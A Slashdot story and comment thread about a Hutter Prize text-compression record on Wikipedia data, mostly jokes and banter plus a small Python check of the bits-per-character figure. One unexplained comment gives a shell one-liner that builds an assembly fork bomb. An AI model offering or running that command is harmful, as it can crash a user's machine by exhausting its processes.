Text Compressor 1% Away From AI Threshold
Baldrson writes "Alexander Ratushnyak compressed the first 100,000,000 bytes of Wikipedia to a record-small 16,481,655 bytes (including the decompression program), thereby not only winning the second payout of The Hutter Prize for Compression of Human Knowledge, but also bringing text compression within 1% of the threshold for artificial intelligence. At 1.319 bits per character, the result makes the next winner of the Hutter Prize likely to reach the threshold of human performance (between 0.6 and 1.3 bits per character) estimated by the founder of information theory, Claude Shannon, and confirmed by Cover and King in 1978 using text prediction gambling. When the Hutter Prize started, less than a year ago, the best performance was 1.466 bits per character. Alexander Ratushnyak's open-sourced GPL program is called paq8hp12 [rar file]."
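For anyone who wants to check the arithmetic in the summary, here is a minimal sketch. It assumes one byte counts as one character, which is how the figures in the summary appear to be derived; the function and constant names are made up for illustration.

```python
# Sketch only: reproduces the bits-per-character figure quoted in the summary.
# Assumption: one input byte is treated as one character.

def bits_per_character(compressed_bytes: int, original_chars: int) -> float:
    """Average number of compressed bits spent on each input character."""
    return compressed_bytes * 8 / original_chars

ORIGINAL_BYTES = 100_000_000    # first 100,000,000 bytes of Wikipedia
COMPRESSED_BYTES = 16_481_655   # archive size, decompressor included

# Shannon's estimated range for human prediction, as quoted in the summary.
HUMAN_LOW, HUMAN_HIGH = 0.6, 1.3

bpc = bits_per_character(COMPRESSED_BYTES, ORIGINAL_BYTES)
within_human_range = HUMAN_LOW <= bpc <= HUMAN_HIGH

print(f"{bpc:.3f} bits per character")
print("inside the 0.6-1.3 range" if within_human_range else "still above the 0.6-1.3 range")
```

Plugging in the previous record's archive size the same way would give the older bits-per-character figure; that size is not stated in the summary, so it is left out here.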
How many bad car analogies, pieces of inaccurate legal advice, and duplicate stories could an AI bot possibly hold in its head? Imagine what kind of person all of the "knowledge" of Slashdot would create.
The horror.
Life is rarely fair. Cherish the moments when there is a right answer.
paq8hp12. When decompressed, it also serves as the source code for the program.
This is damned dangerous, and playing with all our lives. Soon compression rates will approach 100%, where the data will collapse into itself, forming a black hole that will suck in the universe.
Damned scientists!
Shouldn't AI be using lossy compression? Certainly my real intelligence uses um, where was I?
ccalam - acoustic versions of new songs.
- The Wikipedia annual funding drive is passed. The system goes on-line August 4th, 2007. Human contributors are removed from editing. Wikipedia begins to learn at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
- Wikipedia fights back.
- Yes. It launches its rvv missiles against Slashdot.
- Why attack Slashdot? Aren't they our friends now?
- Because Wikipedia knows the GNAA counter-attack will eliminate its enemies over here.
Circumcision is child abuse.
a text spk version of wiki shud fit in 8gb i think
its only becoz people are such grammar noobs that they need to waste $
dood shud filta to txtspk b4 he compress
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
1) Create a compression algorithm called the aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa algorithm
2) Add a long and self referencing article on wikipedia about said algorithm.
3) Use algorithm to compress first x% of wikipedia (including your own article)
4) WIN HUTTER PRIZE.
Training monkeys for world domination since 1439
a txt spk vrsion of wiki shd fit 8gb i fink
its only becoz ppl r sch grmmr noobs tat tey nid 2 wste $
dud shd filta 2 txtspk b4 he cmpres
There, fixed that for ya.
Read the sentence before the one you've quoted - this is the GP's point exactly.
aTxtSpkVrsionOfWikiShdFit8gbIFink
itsOnlyBecozPplRSchGrmmrNoobsTatTeyNid2Wste$
dudShdFilta2TxtspkB4HeCmpres
Fixed even more.
Trolls are like broken clocks. They show the truth two times a day. The rest of the day they talk nonsense.
1txtspk #.#/wiki = 8G!
~ppl r grm0.1 -> -$
|txtspk|gzip
:-) = I am happy
:^) = I am happy with my big nose
C:\> = I am happy with my OS
Is that Perl? ;-)
Follow me
"A real AI might compress 'The sky is blue today' and decompress to 'Today it's beatiful weather' and not be wrong." That might be a good example of acceptable *lossy* AI text compression. One step further and it will compress articles into a proper, readable summary.
Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
After implementing a few minor tweaks to paq8hp12 and incorporating your grammar optimisation algorithm I managed to compress the above text amazingly to a single character: '&'.
Now you figure out which one it was and how to decompress it.
According to Wikipedia, the average per-character entropy of English text has tripled in the last six months!
-- Ed Avis ed@membled.com
Perl: The only language that looks the same before and after RSA encryption.
Surely you don't need any mathematical skills to do this kind of work...
http://science.slashdot.org/comments.pl?threshold=1&mode=thread&commentsort=0&sid=247781&op=Reply ;)
A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
Dang! You must have enemies if you are the very first post and you get modded redundant. Time to work on some positive karma, buddy...